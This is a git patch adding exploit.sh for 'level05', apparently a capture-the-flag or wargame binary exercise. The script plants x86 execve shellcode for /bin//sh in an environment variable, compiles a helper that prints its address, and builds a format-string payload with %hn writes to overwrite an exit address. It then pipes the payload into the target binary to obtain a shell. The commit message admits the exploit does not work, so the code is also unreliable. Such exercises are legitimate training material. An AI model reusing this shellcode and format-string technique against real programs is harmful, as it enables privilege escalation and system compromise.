From 0d0573136e111b29df4f32ca2b7146335f7399db Mon Sep 17 00:00:00 2001
From: 0x35c <>
Date: Sat, 10 May 2025 12:57:04 +0200
Subject: [PATCH] level05: exploit should be working but smh does not

---
 level05/ressources/exploit.sh | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 level05/ressources/exploit.sh

diff --git a/level05/ressources/exploit.sh b/level05/ressources/exploit.sh
new file mode 100644
index 0000000..4669587
--- /dev/null
+++ b/level05/ressources/exploit.sh
@@ -0,0 +1,32 @@
+#!/bin/sh
+
+export SHELLCODE="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"
+
+printf '
+#include
+#include
+
+int main(void)
+{
+ printf(\"%%x\", (unsigned int)getenv(\"SHELLCODE\"));
+ return 0;
+}' > /tmp/env.c
+
+gcc -m32 /tmp/env.c -o /tmp/a.out
+/tmp/a.out > /tmp/shellcode_addr
+
+printf '
+with open("/tmp/shellcode_addr") as f: shellcode_addr = f.read()
+
+exit_addr_low = "\\x08\\x04\\x97\\xe0"[::-1]
+exit_addr_high = "\\x08\\x04\\x97\\xe2"[::-1]
+shellcode_low = int(shellcode_addr[4:], 16) - 8
+shellcode_high = int(shellcode_addr[:4], 16) - shellcode_low - 8
+
+payload = "%%{0}d%%10$hn%%{1}d%%11$hn".format(shellcode_low, shellcode_high)
+exploit = exit_addr_low + exit_addr_high + payload
+
+print(exploit)
+' > /tmp/exploit.py
+
+(python /tmp/exploit.py; cat) | ./level05